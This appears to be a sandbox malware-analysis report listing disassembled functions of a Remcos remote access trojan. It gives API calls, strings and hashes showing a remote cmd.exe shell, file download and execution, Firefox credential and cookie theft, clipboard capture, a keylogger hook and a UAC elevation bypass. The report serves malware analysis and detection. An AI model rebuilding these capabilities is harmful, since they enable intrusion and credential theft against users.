                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                          • Sleep.KERNEL32(000007D0), ref: 00408733
                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                          • API String ID: 1067849700-181434739
                          • Opcode ID: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                          • Opcode Fuzzy Hash: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                          Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004056E6
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • __Init_thread_footer.LIBCMT ref: 00405723
                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                          • CloseHandle.KERNEL32 ref: 00405A23
                          • CloseHandle.KERNEL32 ref: 00405A2B
                          • CloseHandle.KERNEL32 ref: 00405A3D
                          • CloseHandle.KERNEL32 ref: 00405A45
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                          • API String ID: 2994406822-18413064
                          • Opcode ID: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                          • Opcode Fuzzy Hash: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                          Function 00412132 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                          • OpenMutexA.KERNEL32 ref: 00412181
                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.|$fsutil.exe$rmclient.exe$svchost.exe
                          • API String ID: 3018269243-3594870333
                          • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                          • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                          Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                          • API String ID: 1164774033-3681987949
                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                          Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32 ref: 004168FD
                          • EmptyClipboard.USER32 ref: 0041690B
                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                          • CloseClipboard.USER32 ref: 00416990
                          • OpenClipboard.USER32 ref: 00416997
                          • GetClipboardData.USER32 ref: 004169A7
                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                          • CloseClipboard.USER32 ref: 004169BF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                          • String ID: !D@
                          • API String ID: 3520204547-604454484
                          • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                          • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                          Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Close$File$FirstNext
                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 3527384056-432212279
                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                          Function 0040F4AF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 210processCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.|$ieinstal.exe$ielowutil.exe
                          • API String ID: 3756808967-2914824049
                          • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                          • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                          Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                          • CloseHandle.KERNEL32(?), ref: 004134A0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                          • String ID:
                          • API String ID: 297527592-0
                          • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                          • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                          Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0$1$2$3$4$5$6$7$VG
                          • API String ID: 0-1861860590
                          • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                          • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                          Function 0041C322 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C37D
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C3AD
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C41F
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C42C
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C402
                          • GetLastError.KERNEL32(?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C44D
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C463
                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C46A
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C473
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                          • String ID: `.|
                          • API String ID: 2341273852-3844220425
                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                          Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0040755C
                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Object_wcslen
                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                          • API String ID: 240030777-3166923314
                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                          Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                          • GetLastError.KERNEL32 ref: 0041A84C
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                          • String ID:
                          • API String ID: 3587775597-0
                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                          Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID: JD$JD$JD
                          • API String ID: 745075371-3517165026
                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                          Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 1164774033-405221262
                          • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                          • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                          Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Find$CreateFirstNext
                          • String ID: 8SG$PXG$PXG$NG$PG
                          • API String ID: 341183262-3812160132
                          • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                          • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                          Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                          • GetLastError.KERNEL32 ref: 0040A328
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetMessageA.USER32 ref: 0040A376
                          • TranslateMessage.USER32(?), ref: 0040A385
                          • DispatchMessageA.USER32(?), ref: 0040A390
                          Strings
                          • Keylogger initialization failure: error , xrefs: 0040A33C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                          • String ID: Keylogger initialization failure: error
                          • API String ID: 3219506041-952744263
                          • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                          • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                          Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
